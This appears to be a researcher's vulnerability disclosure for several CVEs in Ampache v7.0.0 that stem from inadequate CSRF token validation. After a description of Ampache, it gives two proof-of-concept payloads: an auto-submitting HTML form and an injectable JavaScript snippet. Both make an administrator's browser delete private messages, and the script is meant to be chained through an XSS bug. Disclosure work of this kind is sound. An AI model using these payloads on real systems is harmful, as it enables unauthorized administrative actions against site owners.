CVE-2024–51489, CVE-2024–51488, CVE-2024–51485, CVE-2024–51484, CVE-2024–51487 | Ampache v7.0.0 XSS | Inadequate Cross-Site Request Forgery (CSRF) token validation
Introduction to CVE-2024–51489, CVE-2024–51488, CVE-2024–51485, CVE-2024–51484, CVE-2024–51487
CVE-2024–51489, CVE-2024–51488, CVE-2024–51485, CVE-2024–51484, and CVE-2024–51487 highlight several security vulnerabilities within the application that jeopardize user data integrity and availability. Specifically, inadequate validation of Cross-Site Request Forgery (CSRF) tokens enables an attacker to execute unauthorized requests on behalf of a user who inadvertently visits a malicious website. This vulnerability could allow an attacker to send messages on behalf of the administrator and enable or disable mutiples website features that are typically restricted to admin control.
What is Ampache
Ampache is an advanced web-based media streaming application designed to manage and play audio and video files online. It empowers users to organize, access, and stream their media collections from anywhere, making it a versatile tool for music and video enthusiasts.
The platform features a user-friendly interface that allows users to easily upload and manage their media without requiring extensive technical skills, making it accessible to a wide audience. Additionally, Ampache supports multiple platforms, enabling users to stream their media on various devices, including computers, smartphones, and tablets, which significantly enhances accessibility.
One of Ampache’s standout features is its ability to stream high-quality audio and video in real time, ensuring an enjoyable user experience. It also offers integration with various tools and services, providing flexibility in how users can manage and play their media. As an open-source project, Ampache allows users to customize the software to meet their specific needs, further increasing its utility.
Developed by a dedicated community of contributors, Ampache has grown into a robust platform that continues to evolve. Its extensive capabilities and ongoing development are a testament to the commitment of its community, making it a remarkable achievement in the realm of media streaming solutions.
Exploitation Phase
Now that you understand what Ampache is, let’s delve deeper into the specifics of this CVE and explore how an attacker might exploit it. We will begin by demonstrating a straightforward vulnerability and then illustrate a relevant use case in which an attacker could leverage this vulnerability against an administrator to perform unauthorized action.
Simple Exploitation
To exploit this Cross-Site Request Forgery (CSRF) vulnerability, an attacker would typically create a form on their malicious website. When an administrator visits this page, the form would automatically submit a request, thereby executing the CSRF attack.
<html>
<body>
<form action="https://ampache/pvmsg.php?action=confirm_delete&msgs=123" method="POST">
<input type="hidden" name="form_validation" value="Inadequate-token-validation" />
<input type="submit" value="Submit request" />
<script>
document.forms[0].submit();
</script>
</form>
</body>
</html>Attacker Scenario Exploiting the Vulnerability
In this particular case, we face an issue where cookies are not included in the request, likely due to restrictions that prevent them from being sent cross-site. To effectively exploit this CSRF vulnerability, you can utilize an existing Cross-Site Scripting (XSS) vulnerability, such as the one identified in CVE #1–3. This approach allows you to bypass the cookie restrictions, as the exploit will occur within the same site.
const form = document.createElement('form');
form.action = 'https://ampache/pvmsg.php?action=confirm_delete&msgs=123';
form.method = 'POST';
const hiddenInput = document.createElement('input');
hiddenInput.type = 'hidden';
hiddenInput.name = 'form_validation';
hiddenInput.value = 'Inadequate-token-validation';
form.appendChild(hiddenInput);
document.body.appendChild(form);
form.submit();Other References
For the latest updates on my developments and research, be sure to check out my GitHub profile.
